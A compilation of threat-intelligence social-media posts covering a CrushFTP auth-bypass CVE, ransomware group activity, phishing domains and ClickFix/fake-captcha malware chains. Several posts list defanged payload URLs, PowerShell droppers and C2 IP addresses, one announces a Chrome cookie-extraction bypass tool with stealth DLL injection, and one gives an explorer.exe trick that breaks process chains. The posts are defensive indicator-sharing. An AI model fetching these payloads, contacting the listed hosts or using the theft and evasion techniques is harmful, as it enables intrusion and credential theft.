We wrote up what Huntress has been seeing for the CrushFTP authentication bypass: CVE-2025-31161 (or CVE-2025-2825, whichever side of the bed you woke up on) leading to MeshCentral agents, AnyDesk, and neato "TelegramBot" malware. Patch plz! ✌️ huntress.com/blog/crushftp-…

🚨 Weekly Ransomware Threat Update - Top Groups Remain Active 🚨 Here's a look at the 8 most active ransomware groups of 2025, as of this week: 🔷RansomHub – 235 attacks 🔺 🔷CLOP – 230 attacks 🔻 🔷Akira – 162 attacks 🔷Qilin – 121 attacks 🔷Lynx – 104 attacks 🔷Play – 93

Week 14 - 2025 #DFIR thisweekin4n6.com/2025/04/06/wee…

"Please help me with #booking" #fakecaptcha #clickfix 👇 meteoforecast[.icu 👇 uncanceletion.]world 👇 cdn.jsdelivr.]net/gh/repository-git/q/verif-sec.js .js change to ps1 👇 MSI 62 Samples (domains related / hunting) bazaar.abuse.ch/browse/tag/cdn… AnyRun app.any.run/tasks/cebf812b… 1/2

Human-operated ransomware attacks frequently involve compromising domain controllers, which attackers then use as the primary spreader device — the system responsible for distributing ransomware at scale within a compromised environment. msft.it/6018qFECm

During the past few months, criminals have registered several tax return-themed domains. These domains host #phishing and #scam sites that take advantage of #TaxReturn season. Stay alert! Verify sites that claim to be the IRS or tax services. More info at bit.ly/4j3ECWW

This was some fun research for our team to work on! It really gives you a good introspective into how Black Basta functioned! spycloud.com/blog/digesting…

How domain fronting works. #ThreatHunting #DFIR

#booking #fakecaptcha #clickfix > #asyncrat 👇 partlet-id739847].com 👇 booking.partners-id739847.]com 👇 ⛔️185.39.17.70/zgrnf/ fresh.html (ps1) nums.bat pixel.exe qxm.exe ✅Samples bazaar.abuse.ch/browse/tag/185… ✅AnyRun app.any.run/tasks/5b45ea5e…

#booking #fakecaptcha #clickfix 👇 ⛔️booking-refguestitem-09064111.]com 👇 ⛔️demopark.]com.]tr/rayidverifications.txt (ps1) 👇 ⛔️demopark.]com].tr/GUP.zip (payload) ⛔️C2 185.7.214].3 ✅Samples bazaar.abuse.ch/browse/tag/dem… ✅AnyRun app.any.run/tasks/1652e2f0… app.any.run/tasks/e9127307…

Marks & Spencer breach linked to Scattered Spider ransomware attack - Lawrence Abrams bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…

The DFIR Report has published data from an open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group. The open directory contained tools and scripts for reconnaissance, exploitation, lateral movement, and persistence. thedfirreport.com/2025/04/28/nav…

How process hollowing works. #ThreatHunting #DFIR

🚀 Just dropped v0.5 of my Chrome App-Bound Encryption Decryption tool! Full user-mode (no admin), all path-validation bypasses, full cookie extraction (JSON 🍪) and stealth DLL injection. Chrome’s ABE is officially broken, works on Chrome, Edge & Brave. Anything else to tackle

How lateral movement with WMI event subscriptions works. #ThreatHunting #DFIR

2025-05-22 (Thursday) After reports of the recent #LummaStealer disruption, a campaign we saw distributing Lumma Stealer earlier this week switched to pushing #StealC v2 today. Details at bit.ly/43bEC1M #StealCv2 #TimelyThreatIntel

#Bumblebee from nir-soft[.]org (x.com/1ZRR4H/status/…). Botnet: grp0005 C2: 188.40.187.152 (although not flagged by any AV, the IP has been linked to Bumblebee campaigns since approximately April 2024). Bumblebee has been used in ransomware attacks. MalwareHunterTeam

#HuntingTipOfTheDay: explorer.exe /root,"c:/your/file.exe" will spawn your exe from the main explorer.exe, not a new one. This breaks normal process chains. Hunt for explorer.exe with "/root", as well as explorer spawning unusual children (e.g. rundll32, mshta, powershell).

🎂 Yesterday marked 6 years since the rise of LockBit — one of the most notorious ransomware groups in history. 💀 With over 3,000 confirmed victims, LockBit remains the most prolific ransomware operation to date. 🔥 Now, the group is making headlines again by launching a new

How a Windows reverse shell works. 🐚 #ThreatHunting #DFIR